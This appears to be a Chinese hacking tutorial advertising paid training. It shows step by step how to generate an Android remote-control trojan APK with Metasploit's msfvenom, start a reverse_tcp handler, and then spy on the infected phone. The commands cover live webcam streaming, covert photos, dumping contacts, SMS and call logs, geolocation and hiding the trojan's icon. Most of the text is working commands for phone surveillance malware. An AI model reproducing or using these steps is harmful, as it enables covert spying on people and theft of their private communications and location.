使用Kali的metasploit生成安卓APK木马控制安卓手机

使用Kali的metasploit生成安卓APK木马控制安卓手机

前提：在虚拟机里面安装kali系统，再就是本机安装一个夜神模拟器，和一个安卓5的环境

如果不会的话，可以报名跟我们学习，联系方式hk007.cn

 

第一步：在终端输入ip addr命令查看kali主机的IP地址

ip addr

我的kali主机IP地址为192.168.2.146   每个人的不一样，灵活运用

 

 

第二步，输入生成反弹木马命令：

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.2.146 lport=55555 R > /home/yxs.apk

注意了，命令ip地址必须跟你自己的kali主机IP地址保持一致

 

 

然后在kali系统的根路径的home文件夹下面会出现一个apk文件，把虚拟机kali系统

里面的这个apk文件复制到本机，然后拖到夜神模拟器里面安装并且运行。

 

 

第三步：启动msfconsole，配置相关参数

msfconsole //启动msfconsole
use exploit/multi/handler //加载模块
set payload android/meterpreter/reverse_tcp //选择Payload
set lhost 192.168.2.146 //这里的地址设置成我们刚才生成木马的IP地址
set lport 55555
exploit //开始执行漏洞 开始监听,等待手机上线

 

第四步：点一下夜神模拟器上面的MainActivity程序（即安卓远控木马），我们

会在kali里面发现有主机上线了。

 

 

第五步：使用各种命令开始操控手机，那我们都可以做些什么呢？

5.1查看手机信息

sysinfo

 

 5.2查看手机有多少个摄像头

webcam_list

 

 5.3开启摄像头

webcam_stream

 

 

 

 然后在kali系统中打开这个html文件，即可在线实时监控摄像头画面

 

 

 

 

 5.4导出电话号码

dump_contacts

 

 5.5导出短信信息

dump_sms

5.6通过摄像头拍照功能

webcam_snap

5.X其他命令大全

send_sms  //从目标会话发送短消息
webcam_snap //隐秘拍照功能
webcam_snap  //从指定的摄像头获取快照
check_root  //检查设备是否有根
hide_app_icon //隐藏手机端木马程序图标
dump_calllog //获取通话记录
geolocate //获取手机的当前的经纬度
set_audio_mode //Set Ringer Mode
sqlite_query //Query a SQLite database from storage
wakelock // Enable/Disable Wakelock
wlan_geolocate // Get current lat-long using WLAN information
app_install // Request to install apk file
app_list // List installed apps in the device
app_run // Start Main Activty for package name
app_uninstall //Request to uninstall application

 

后记：如果还是学不懂，可以报名参加培训班，联系方式hk007.cn

这一节只是最简单的用法，还有更高级的frp穿透，开机自启，安卓免杀等内容教学。